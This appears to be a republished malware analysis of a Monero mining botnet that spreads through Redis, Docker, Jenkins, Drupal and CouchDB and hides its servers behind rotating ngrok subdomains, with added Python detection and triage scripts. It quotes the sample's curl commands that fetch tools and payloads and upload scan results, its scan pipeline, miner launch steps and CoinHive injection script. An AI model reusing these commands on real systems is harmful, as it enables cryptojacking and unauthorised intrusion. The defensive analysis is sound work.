Shulou (Shulou.com), 05/31 report. Updated 2025-04-01. Source: SLTechnology News & Howtos, Network Security section.
This article explains how a mining sample uses ngrok to spread. Many newcomers are unclear on how this works, so the details are laid out below for anyone who needs them.
Overview
"Blockchain cures all ills, and the medicine can never be stopped." Mining malware of every kind now springs up faster than it can possibly be killed off, so most of it we simply ignore. This mining sample, however, caught our attention: it uses ngrok to generate a large number of random domain names as its Downloader and Report domains, which makes blocking by domain name ineffective and hides the real server address.
The main features of the malicious sample are:
Uses random ngrok domain names, changed periodically, as its Downloader and Report domains.
Exploits vulnerabilities in Redis, Docker, Jenkins, Drupal, MODX and CouchDB to implant an XMR (Monero) miner.
Attempts to scan for Ethereum (geth) clients in order to steal Ether; this module is currently not actually enabled.
Attempts to infect .js files on the target device by inserting the CoinHive mining script, so that browsers loading those files mine as well.
Generates its mining and scanning scripts dynamically.
The mining sample consists of three parts: a Scanner script, a Miner script and a Loader. The Scanner scans for vulnerable hosts and reports them to the Loader; the Loader implants the Scanner and Miner into the vulnerable devices; the Miner does the mining.
Ngrok
Figure 1: ngrok working principle
How ngrok is used: register an account at ngrok.io, then start the ngrok client locally and have it forward traffic to a port on the private network. The client receives a randomly assigned ngrok subdomain from the server, and through that subdomain the private-network resource becomes reachable from the public Internet. In free mode a single client process may open up to 4 tunnels; each tunnel gets its own subdomain, and every restart of the client assigns a fresh random subdomain to each tunnel.
Domain name lifecycle
To visualise the lifetime of the domain names in use, we plotted a heatmap of the number of times the mining sample successfully fetched files from each domain over the last 48 hours. The figure shows that the sample switches domains periodically and that no domain stays in use for more than 12 hours. According to our data the sample first appeared in late June, and its domain-switching pattern has been the same ever since.
Figure 2: domain name lifecycle
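As an added illustration of how the domain rotation described above can be turned into a detection (this is example code written for this page, not from the sample or the original article), the Python script below groups queries for random 8-hex-character ngrok.io subdomains per client in a constructed DNS query log and flags clients that cycle through several short-lived ones. The log format, the 12-hour lifetime threshold and the minimum of three domains are assumptions for this example; the subdomain pattern follows the IoCs in this article.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample DNS query log: "timestamp client qname" per line.
# Not taken from the original article; the ngrok names mirror its IoC style.
SAMPLE_LOG = """\
2018-08-01T00:05:12 10.0.0.7 3a3c559e.ngrok.io
2018-08-01T00:05:13 10.0.0.7 53349e8c.ngrok.io
2018-08-01T00:05:14 10.0.0.7 e5a22d36.ngrok.io
2018-08-01T03:10:00 10.0.0.7 cc8ef76b.ngrok.io
2018-08-01T09:00:00 10.0.0.7 cc8ef76b.ngrok.io
2018-08-01T12:30:00 10.0.0.7 608f5b6c.ngrok.io
2018-08-01T12:31:00 10.0.0.9 www.example.com
2018-08-01T01:00:00 10.0.0.9 deadbeef.ngrok.io
2018-08-02T05:00:00 10.0.0.9 deadbeef.ngrok.io
2018-08-01T13:00:00 10.0.0.9 myapp.ngrok.io
2018-08-01T20:00:00 10.0.0.7 ce0a62ad.ngrok.io
2018-08-02T01:00:00 10.0.0.7 69c0c72e.ngrok.io
"""

# Free-tier ngrok assigns 8 hex characters; named tunnels (myapp.ngrok.io) do not match.
RANDOM_NGROK = re.compile(r"^[0-9a-f]{8}\.ngrok\.io$")


def parse_log(text):
    """Yield (timestamp, client, qname) tuples from the assumed log format."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, qname = line.split()
        yield datetime.fromisoformat(ts), client, qname.lower()


def ngrok_rotation_report(text, max_lifetime=timedelta(hours=12), min_domains=3):
    """Map client -> sorted list of random ngrok.io subdomains it used, keeping only
    domains whose first-seen/last-seen span is within max_lifetime, and only clients
    that used at least min_domains such domains (the rotation pattern of the sample).
    A single long-lived random subdomain (a developer's own tunnel) is not reported."""
    seen = defaultdict(lambda: defaultdict(list))  # client -> qname -> [timestamps]
    for ts, client, qname in parse_log(text):
        if RANDOM_NGROK.match(qname):
            seen[client][qname].append(ts)

    report = {}
    for client, domains in seen.items():
        short_lived = [
            qname for qname, stamps in domains.items()
            if max(stamps) - min(stamps) <= max_lifetime
        ]
        if len(short_lived) >= min_domains:
            report[client] = sorted(short_lived)
    return report


if __name__ == "__main__":
    for client, domains in ngrok_rotation_report(SAMPLE_LOG).items():
        print(f"{client}: {len(domains)} short-lived random ngrok subdomains -> {domains}")
```

Host 10.0.0.9 is not reported: its only random-looking name lives for 28 hours, and a named tunnel is not matched at all. Tune the thresholds to your own environment; the 12-hour figure comes from the heatmap observation above.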
Scanner
The IP range to scan is generated by the Loader at implantation time; the Report and Downloader domain names are hard-coded in the Scanner script. The steps are:
Download the scanning tools zmap, zgrab and jq:
curl -m 120 -fks -o /usr/bin/zmap "hxxp://3a3c559e.ngrok.io/d8/zmap"
curl -m 120 -fks -o /usr/bin/jq "hxxp://53349e8c.ngrok.io/d8/jq"
curl -m 120 -fks -o /usr/bin/zgrab "hxxp://e5a22d36.ngrok.io/d8/zgrab"
Download the Ethereum (geth) client scan payload:
# curl -m 120 -fks -o /tmp/.p8545 "hxxp://cc8ef76b.ngrok.io/d8/p8545"
POST / HTTP/1.1
Host: %s:8545
User-Agent: geth
Accept: */*
Content-Type: application/json
Content-Length: 60

{"jsonrpc":"2.0","method":"eth_accounts","params":[],"id":1}
Vulnerability scanning: zmap finds hosts with the port open, then zgrab probes the application layer. The sample currently scans ports 6379, 2375, 8080 and 5984, looking for Redis, Docker, Jenkins, Drupal, MODX and CouchDB services.
# for example, scan the redis port
PORT="6379"
# INFO followed by QUIT: an unauthenticated Redis answers with its server info
echo -ne "info\r\nquit\n" > /tmp/rinfoa379f8ca
echo ";${PORT}" > $OUT
# zmap finds open ports, zgrab sends the INFO probe, and only hosts whose reply
# contains redis_version are kept (their IPs appended to $OUT)
/usr/bin/zmap -i $IFACE -B 50m --max-sendto-failures 1000000 -c 5 -o - -p $PORT $IPR 2>>${LOGF} | zgrab --senders 100 --port $PORT --data /tmp/rinfoa379f8ca --output-file=- 2>/dev/null | grep 'redis_version' | jq -r .ip >> ${OUT}
Upload scan results
curl -m 120 -sk -F result=@${_FILE} "hxxp://cc8ef76b.ngrok.io/z?r={RIP}&i={I}&x=${excode}"
Delete traces and exit.
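The following Python snippet is an added example, not code from the sample or the original article; it reproduces the selection logic of the two probes above so a defender can see exactly what the scanner keys on. The zgrab output layout is constructed and assumed for this example (only the ip field and the banner text matter to the pipeline); the geth request is built from the payload shown above, and the function names are my own.

```python
import json

# Constructed zgrab-style NDJSON output, one JSON object per probed host.
# The field layout is an assumption for this example; the sample's pipeline only
# looks for the literal text "redis_version" and then extracts .ip.
SAMPLE_ZGRAB = "\n".join([
    json.dumps({"ip": "192.0.2.10",
                "data": {"banner": "$2560\r\n# Server\r\nredis_version:4.0.9\r\n"}}),
    # requirepass is set: INFO is refused, so this host never appears in the target list
    json.dumps({"ip": "192.0.2.11",
                "data": {"banner": "-NOAUTH Authentication required.\r\n"}}),
    json.dumps({"ip": "192.0.2.12", "error": "connection refused"}),
])


def redis_hits(ndjson):
    """Python equivalent of `grep 'redis_version' | jq -r .ip`: the IPs of hosts
    that answered INFO without authentication."""
    return [json.loads(line)["ip"]
            for line in ndjson.splitlines() if "redis_version" in line]


# The JSON-RPC call carried by the p8545 payload.
GETH_PROBE = {"jsonrpc": "2.0", "method": "eth_accounts", "params": [], "id": 1}


def build_geth_request(host):
    """Rebuild the raw HTTP request from the p8545 payload. Serialising the body
    without whitespace is what yields the Content-Length of 60 seen in the sample."""
    body = json.dumps(GETH_PROBE, separators=(",", ":"))
    return ("POST / HTTP/1.1\r\n"
            f"Host: {host}:8545\r\n"
            "User-Agent: geth\r\n"
            "Accept: */*\r\n"
            "Content-Type: application/json\r\n"
            f"Content-Length: {len(body)}\r\n"
            "\r\n" + body)


def exposed_accounts(response_body):
    """Interpret an eth_accounts reply. A non-empty result list means the node
    enumerates its wallet accounts to anyone who can reach port 8545, which is
    what the (currently disabled) Ether-stealing module would look for.
    Anything that is not a well-formed JSON-RPC reply counts as no exposure."""
    try:
        reply = json.loads(response_body)
    except ValueError:
        return []
    result = reply.get("result") if isinstance(reply, dict) else None
    return result if isinstance(result, list) else []


if __name__ == "__main__":
    print("unauthenticated redis:", redis_hits(SAMPLE_ZGRAB))
    print(build_geth_request("192.0.2.5"))
```

The practical point for defenders: because the pipeline filters on the INFO reply, a Redis instance with requirepass set (or protected mode enabled) answers -NOAUTH and is invisible to this scanner, and a geth node that keeps JSON-RPC off the public interface never returns an account list.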
Miner
The Report and Downloader domain name generated during the Loader's implantation phase is hard-coded in the Miner script:
export HOST="hxxp://608f5b6c.ngrok.io"
Execution flow:
Download and run fc, which sets a global flag marking the infection status. If it runs successfully the infection is considered successful; if it fails, the error message is recorded and later sent to Report.
curl -fks -o $INSTALL/93b689 "$HOST/d8/fc"
$INSTALL/93b689 '/' > 201e3a252c5e 2>&1 &
$INSTALL/93b689 '[^$I$^]' >> 201e3a252c5e 2>&1 &
Kill competing miners.
Collect the old version's Report information (process name, miner MD5, miner file path) so it can be sent to Report.
Kill the old version of itself.
Download daemon (a process management tool) and use it to run nginx (the miner):
curl -fks -o "${RIP}d" "$HOST/d8/daemon"
curl -fks -o dda4512010 "$HOST/d8/nginx"
# the miner binary is fed to the daemon on stdin rather than executed from disk
cat dda4512010 | "${RIP}d"
Check /etc/hosts for other miners' domain names; if any are found, overwrite /etc/hosts with "127.0.0.1 localhost", wiping the hosts-file resolution entries the other miners rely on.
Remove crontab entries that are not its own.
Insert the CoinHive mining script into every .js file in the current directory, infecting the js files on the compromised host. This is probably a bug: the current directory is the sample's own working directory, which contains no .js files.
var js=document.createElement("script");js.type="text/javascript";js.src="hxxps://coinhive.com/lib/coinhive.min.js",document.body.appendChild(js),window.msci=setInterval(function(){var e="CoinHive";if(window[e]){clearInterval(window.msci);var n=window[e].Anonymous;window.__m1||(window.__m1=new n("U1EhkTAx8j1IVGH6KkzoHDuwPy42c7vW"))&&__m1.start()}},200)
Report the miner's running status.
If the miner starts successfully, report the miner's process ID, the infected device's IP, ID and CPU count, the vulnerability used to infect it, and the current user name.
If the miner fails to start, report the error message, including the infection result, the old version's running information (process name, miner MD5, file path), crontab error messages, and so on.
Mining configuration:
Pool address: pool.minexmr.com:55555
Wallet address: 4AuKPF4vUMcZZywWdrixuAZxaRFt9FPNgcv9v8vBnCtcPkHPxuGqacfPrLeAQWKZpNGTJzxKuKgTCa6LghSCDrEyJ5s7dnW
At the time of writing, the wallet's TotalPaid is 69.676550440000 XMR.
IoC
MD5
md5=19e8679be6cfc56a529cf35df2dbece8 uri=hxxp://608f5b6c.ngrok.io/d8/daemon
md5=e309354fe7047a5fca3c774a427ae7a2 uri=hxxp://608f5b6c.ngrok.io/d8/fc
md5=39fcbe99c2d72006667be9bcc286db4e uri=hxxp://608f5b6c.ngrok.io/d8/nginx
md5=510802ce144bb729c3c527d465321168 uri=hxxp://ce0a62ad.ngrok.io/f/serve?l=u&r={RIP}&curl=1
md5=072922760ec200ccce83ac5ce20c46ca uri=hxxp://69c0c72e.ngrok.io/z?r={RIP}&
Loader IP
194.99.105.76 AS9009 M247_Ltd
185.183.104.139 AS9009 M247_Ltd (once seen with i=2a6da41fcf36d873dde9ed0040fcf99ba59f579c3723bb178ba8a2195a11fb61cb6b669ed0f32fb9bdc891e64613e0caad46642f7a9b68ccea30244b4d0addf6d506be7e2c71c3c3793762e8e2a40117f62f0688cfad660a6f9529d3e17e183d769864ea45294d9dca4712ee73d5733)
185.242.6.4 AS9009 M247_Ltd
46.166.142.220 AS43350 NForce_Entertainment_B.V.
217.23.3.91 AS49981 WorldStream_B.V.
89.39.107.195 AS49981 WorldStream_B.V.
185.159.157.19 AS59898 AllSafe_Sarl
194.99.105.75 AS9009 M247_Ltd
109.201.133.24 AS43350 NForce_Entertainment_B.V.
217.23.3.92 AS49981 WorldStream_B.V.
46.166.142.215 AS43350 NForce_Entertainment_B.V.
89.39.107.192 AS49981 WorldStream_B.V.
109.201.133.22 AS43350 NForce_Entertainment_B.V.
89.39.107.202 AS49981 WorldStream_B.V.
89.39.107.199 AS49981 WorldStream_B.V.
109.201.133.26 AS43350 NForce_Entertainment_B.V.
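As an added host-triage example (written for this page, not part of the sample or the original article), the Python script below checks for the artefacts the Miner and Scanner leave behind: crontab entries fetching from random ngrok.io subdomains, CoinHive site keys injected into .js files, files whose MD5 matches the IoC list above, and the tool and payload paths the Scanner drops. The sample crontab is constructed; the sample .js content is the injected script from the Miner section; the function names and the way the caller supplies file data are my own choices so the script runs offline.

```python
import hashlib
import re

# MD5s of the dropped files, copied from the IoC list in this article.
IOC_MD5 = {
    "19e8679be6cfc56a529cf35df2dbece8": "daemon",
    "e309354fe7047a5fca3c774a427ae7a2": "fc",
    "39fcbe99c2d72006667be9bcc286db4e": "nginx (miner)",
    "510802ce144bb729c3c527d465321168": "f/serve (loader)",
    "072922760ec200ccce83ac5ce20c46ca": "z (report)",
}

# Random 8-hex-character ngrok subdomain, the Downloader/Report URL style of the sample.
NGROK_URL = re.compile(r"https?://[0-9a-f]{8}\.ngrok\.io/\S*", re.I)

# CoinHive loader followed by the `new n("<32-char site key>")` constructor
# from the script the Miner injects into .js files.
COINHIVE_KEY = re.compile(
    r'coinhive\.com/lib/coinhive\.min\.js.*?new\s+n\("([A-Za-z0-9]{32})"\)', re.S)

# Paths the Scanner drops its tools and probe payloads into (from the Scanner section).
DROPPED_PATHS = ("/usr/bin/zmap", "/usr/bin/zgrab", "/usr/bin/jq",
                 "/tmp/.p8545", "/tmp/rinfoa379f8ca")

# Constructed crontab: one benign line and one line of the kind the sample would add.
SAMPLE_CRONTAB = """\
0 3 * * * /usr/bin/certbot renew --quiet
*/15 * * * * curl -fks http://608f5b6c.ngrok.io/d8/fc | sh
"""

# The injected script as shown in the Miner section (defanged scheme kept as-is).
SAMPLE_JS = """var js=document.createElement("script");js.type="text/javascript";js.src="hxxps://coinhive.com/lib/coinhive.min.js",document.body.appendChild(js),window.msci=setInterval(function(){var e="CoinHive";if(window[e]){clearInterval(window.msci);var n=window[e].Anonymous;window.__m1||(window.__m1=new n("U1EhkTAx8j1IVGH6KkzoHDuwPy42c7vW"))&&__m1.start()}},200)"""


def crontab_findings(crontab_text):
    """Crontab lines that fetch anything from a random ngrok.io subdomain."""
    return [ln for ln in crontab_text.splitlines() if NGROK_URL.search(ln)]


def coinhive_site_keys(js_text):
    """CoinHive site keys found in a .js file (empty list if the file is clean)."""
    return COINHIVE_KEY.findall(js_text)


def ioc_match(data):
    """Name of the dropped file whose MD5 matches the IoC list, else None."""
    return IOC_MD5.get(hashlib.md5(data).hexdigest())


def triage(crontab_text, js_files, file_contents, existing_paths):
    """js_files: {path: text}; file_contents: {path: bytes} for suspicious binaries;
    existing_paths: paths present on the host. The caller collects these (e.g. with
    `crontab -l`, os.walk and open()) so this function itself needs no host access."""
    ioc_hashes = {}
    for path, data in file_contents.items():
        name = ioc_match(data)
        if name:
            ioc_hashes[path] = name
    return {
        "crontab": crontab_findings(crontab_text),
        "coinhive": {p: k for p, t in js_files.items() for k in coinhive_site_keys(t)},
        "ioc_hashes": ioc_hashes,
        "dropped_tools": sorted(set(existing_paths).intersection(DROPPED_PATHS)),
    }


if __name__ == "__main__":
    result = triage(SAMPLE_CRONTAB, {"/var/www/app.js": SAMPLE_JS},
                    {"/tmp/x": b"constructed, not a real sample"},
                    ["/usr/bin/zmap", "/bin/ls"])
    for key, value in result.items():
        print(f"{key}: {value}")
```

Hash matching is only as good as the IoC list, and the sample changes its domains every few hours; the crontab, CoinHive-key and dropped-path checks are the ones that survive a new build of the same scripts.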